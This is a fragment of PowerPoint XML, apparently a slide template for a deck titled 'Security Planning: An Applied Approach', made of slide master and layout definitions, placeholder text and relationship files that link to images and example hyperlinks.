          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="522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Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4680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834391276"/>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_comparis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extplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522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extplatzhalter 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4680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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4680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1214223356"/>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5_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Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="1519239"/>
            <a:ext cx="8154988" cy="4160062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="940635813"/>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6_tab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able Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="1519238"/>
            <a:ext cx="8154988" cy="4879975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Click icon to add table</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2445520713"/>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7_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0809151"/>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8_basic grid">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Gruppierung 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CA7FB88-6ABC-4C31-AC43-EF614F09E451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="503238" y="908050"/>
            <a:ext cx="8172450" cy="5975350"/>
            <a:chOff x="539552" y="908720"/>
            <a:chExt cx="8157581" cy="5974680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="5" name="Gerade Verbindung 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E66466D-4159-44A2-A215-ADBCBEA93909}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="547475" y="927768"/>
              <a:ext cx="0" cy="5949283"/>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6" name="Gerade Verbindung 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82AD97C0-1ED8-429E-9A3F-3DFE0C98C2DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8690795" y="908720"/>
              <a:ext cx="0" cy="5974680"/>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7" name="Gerade Verbindung 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96A8789A-2AA5-4B53-9E15-3E5852D75F75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="553813" y="1162692"/>
              <a:ext cx="8141735" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:prstDash val="dash"/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:noFill/>
                </a14:hiddenFill>
              </a:ext>
            </a:extLst>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Gerade Verbindung 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{962F0CFC-836A-4F7F-8C2C-4A299799DD85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="539552" y="913482"/>
              <a:ext cx="8157581" cy="15873"/>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9" name="Gerade Verbindung 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C099AF-D727-4E6A-8E48-633EC543AF2C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="556982" y="6389743"/>
              <a:ext cx="8130643"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10" name="Gerade Verbindung 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C66C1B15-11CE-4293-BEAC-9082E105A25D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="547475" y="1515077"/>
              <a:ext cx="8143320"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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3635897" y="2996952"/>
            <a:ext cx="1800200" cy="504056"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2414509845"/>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2.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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3008C461-0ED6-482C-95EC-45864C26EBEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="520700" y="917575"/>
            <a:ext cx="81549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de-DE" altLang="en-US"/>
              <a:t>Click to edit Headline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44599B2C-5BF0-4BCC-B4D9-7E8551C42E81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="520700" y="1808163"/>
            <a:ext cx="8154988" cy="456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en-US"/>
              <a:t>Click to edit text </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Bild 1" descr="Kopfbalken.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5583EE-1876-475A-B0FC-46BAE5FB31D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId23">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="203200" y="0"/>
            <a:ext cx="8940800"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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D503A490-A183-40AB-92FF-35673D54971C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="522288" y="212725"/>
            <a:ext cx="25923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180000" rIns="0" bIns="3600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Security Planning: An Applied Approach | </a:t>
            </a:r>
            <a:fld id="{A6B64A83-457F-4064-8DCE-7FEA2F1E7741}" type="datetime1">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a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>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 | </a:t>
            </a:r>
            <a:fld id="{878CB627-7F35-48DC-9F04-82F15D090A91}" type="slidenum">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a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" altLang="en-US" sz="900" b="1">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Geneva"/>
              <a:cs typeface="Geneva"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Abgerundetes Rechteck 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4ABF28-0204-44CF-909D-11284C03C538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="0" y="0"/>
            <a:ext cx="179388" cy="612775"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="10000">
                <a:schemeClr val="accent2"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="0"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Geneva" charset="0"/>
              <a:cs typeface="Geneva" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Gerade Verbindung 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA359912-59F6-48BB-9526-83AF6C0069C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7350125" y="115888"/>
            <a:ext cx="0" cy="360362"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1DDE9"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032" name="Bild 10" descr="Springer_pms.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAA63EE-E1D3-41B9-9883-586D7523B195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7599363" y="141288"/>
            <a:ext cx="11176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54" r:id="rId1"/>
    <p:sldLayoutId id="2147484236" r:id="rId2"/>
    <p:sldLayoutId id="2147484237" r:id="rId3"/>
    <p:sldLayoutId id="2147484238" r:id="rId4"/>
    <p:sldLayoutId id="2147484239" r:id="rId5"/>
    <p:sldLayoutId id="2147484240" r:id="rId6"/>
    <p:sldLayoutId id="2147484241" r:id="rId7"/>
    <p:sldLayoutId id="2147484242" r:id="rId8"/>
    <p:sldLayoutId id="2147484255" r:id="rId9"/>
    <p:sldLayoutId id="2147484257" r:id="rId10"/>
    <p:sldLayoutId id="2147484258" r:id="rId11"/>
    <p:sldLayoutId id="2147484259" r:id="rId12"/>
    <p:sldLayoutId id="2147484260" r:id="rId13"/>
    <p:sldLayoutId id="2147484261" r:id="rId14"/>
    <p:sldLayoutId id="2147484262" r:id="rId15"/>
    <p:sldLayoutId id="2147484263" r:id="rId16"/>
    <p:sldLayoutId id="2147484264" r:id="rId17"/>
    <p:sldLayoutId id="2147484265" r:id="rId18"/>
    <p:sldLayoutId id="2147484266" r:id="rId19"/>
    <p:sldLayoutId id="2147484267" r:id="rId20"/>
    <p:sldLayoutId id="2147484268" r:id="rId21"/>
  </p:sldLayoutIdLst>
  <p:transition spd="slow"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600" b="1">
          <a:solidFill>
            <a:srgbClr val="00468A"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="Calibri"/>
          <a:cs typeface="Lucida Sans"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5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5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2100" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2100" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2100" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2100" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1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a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri"/>
          <a:ea typeface="ヒラギノ角ゴ Pro W3" pitchFamily="-65" charset="-128"/>
          <a:cs typeface="ヒラギノ角ゴ Pro W3" pitchFamily="-65" charset="-128"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2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ヒラギノ角ゴ Pro W3" charset="-128"/>
          <a:cs typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3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MS PGothic" pitchFamily="34" charset="-128"/>
          <a:cs typeface="Geneva" charset="-128"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4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4pPr>
      <a:lvl5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5pPr>
      <a:lvl6pPr marL="13985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6pPr>
      <a:lvl7pPr marL="18557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7pPr>
      <a:lvl8pPr marL="23129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8pPr>
      <a:lvl9pPr marL="27701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11EC69A5-AA82-483F-8B86-9496E974F9CF}"/>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76C0DC09-F461-42D4-84BE-979EDA51058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3AEA5F96-ECF6-4EBA-AE01-0425768A3688}"/>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98D6D95-7C4D-4725-9759-F250E94B0A14}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAEAAD40-684C-41A4-A7CA-03C1A92FC4D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400C0C39-E6F8-4DEC-B2C7-B474323563B0}"/>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2FE6C212-9949-4182-A111-B97A7CC7509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243" r:id="rId1"/>
    <p:sldLayoutId id="2147484244" r:id="rId2"/>
    <p:sldLayoutId id="2147484245" r:id="rId3"/>
    <p:sldLayoutId id="2147484246" r:id="rId4"/>
    <p:sldLayoutId id="2147484247" r:id="rId5"/>
    <p:sldLayoutId id="2147484248" r:id="rId6"/>
    <p:sldLayoutId id="2147484249" r:id="rId7"/>
    <p:sldLayoutId id="2147484250" r:id="rId8"/>
    <p:sldLayoutId id="2147484251" r:id="rId9"/>
    <p:sldLayoutId id="2147484252" r:id="rId10"/>
    <p:sldLayoutId id="214748425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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.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image" Target="../media/image8.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8.emf"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.abc.com/344" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.abc.com/123" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.abc.com/123" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.abc.com/345"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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout21.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.emf"/></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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout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7.wmf"/><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27.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout21.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.w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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.emf"/><Relationship Id="rId4" 